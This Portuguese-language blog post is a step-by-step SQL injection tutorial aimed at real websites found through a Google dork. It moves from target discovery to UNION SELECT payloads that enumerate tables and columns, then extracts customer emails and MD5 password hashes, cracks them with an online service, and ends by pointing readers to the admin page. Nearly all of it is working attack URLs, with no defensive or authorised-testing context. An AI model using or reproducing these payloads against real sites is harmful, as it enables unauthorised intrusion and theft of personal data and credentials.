Podemos usar essa DORK
(DIGITEM NO GOOGLE)
inurl .php?id=
Escolha o site alvo!
Faça o teste a SQL Injection usando uma aspa simples
EX: http://www.xxxx.com.br/lerNoticia.php?id=143’
Se aparecer uma mensagem semelhante a essa :
Erro MySQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
(O Site está vulnerável)
Então começamos a exploração!
Seguintes passos
1° PASSO ;
Comando order by
EX: : http://www.xxxx.com.br/lerNoticia.php?id=143 order by 5-- (Página carrega sem ERRO)
http://www.xxxx.com.br/lerNoticia.php?id=143 order by 6-- (Página carrega sem ERRO)
http://www.xxxx.com.br/lerNoticia.php?id=143 order by 7-- (Página carrega sem ERRO)
http://www.xxxx.com.br/lerNoticia.php?id=143 order by 8-- (Página carrega sem ERRO)
http://www.xxxx.com.br/lerNoticia.php?id=143 order by 9-- (Página carrega com ERRO)
OBS: Significa que temos 8 TABELAS
2° PASSO
union all select
EX: http://www.xxxx.com.br/lerNoticia.php?id=-143 union all select 1,2,3,4,5,6,7,8-- (8 numeros porque são o números de Tabelas que encontramos) e Não se esqueçam de por o sinal negativo depois do ?id=-
Agora o site vai carregar ,fiquem atentos aos números “discretos” que apareceram!
EX: vamos supor que apareça o número 2 em um canto e o número 7 em outro.
3° Passo substituir os números “discretos” por comandos
(No Caso o 2 e o 7)Podemos escolher um dos dois
Comando
@@version
EX: http://www.xxxx.com.br/lerNoticia.php?id=-143 union all select 1,@@version,3,4,5,6,7,8—
Para vermos a versão do sql
Aparecerá alguma ex: 5.5.46-log
4° Passo
Comandos
group_concat(table_name)
from information_schema.table s where table_schema=database()--
EX: http://www.xxxx.com.br/lerNoticia.php?id=-143 union all select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.table s where table_schema=database()—
Aparecerá os nomes respectivos das Tabelas
Por exemplo ; cadastro_clientes,cadastro_clientes_area,cadastro_clientes_nivel,familias,listaesc,user_adm,pwd_adm
5° Passo
Comandos
Group_concat(column_name)
From information_schema.colum ns where table_name=0x (HEXADECIMAL)
Converter a palavra da Tabela que queremos , nesse caso ; cadastro_clientes
Site para conversão http://www.convertstring.com/pt_PT/EncodeDecode/HexEncode
Em seguidas vamos adiante
EX: http://www.xxxx.com.br/lerNoticia.php?id=-143 union all select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.colum ns where table_name=0x636164617374726F5F636C69656E746573--
Aparecerá alguns nomes das colunas
Por exemplo ; Nome,Contato, ,Email,Senha,CPF, ,Data_nasc,Sexo,Endereco,Num_compl,Bairro,CEP,Cidade,UF,Fone,Fax
6° Passo
Comando from
Group_concat( “Email,Senha”) Escolhi neste caso 2 palavras da coluna, Email, e a Senha. Pode escolher mais se quiser.
EX: http://www.xxxx.com.br/lerNoticia.php?id=-143 union all select 1,group_concat(Email,0x3,Senha),3,4,5,6,7,8 from cadastro_clientes—
Email Senha
xxxx@bol.com.br; 202cb962ac59075b964b0715 2d234b70 separado por ponto e vírgula.
Normalmente a senha vem criptografada
Neste caso em MD5
Senha em hash MD5
Site para descriptar : https://hashkiller.co.uk/md5-decrypter.aspx
Hash Senha
EX: 202cb962ac59075b964b0715 2d234b70 = 123
Agora é só a achar a página do administrador do site.
Nenhum comentário:
Postar um comentário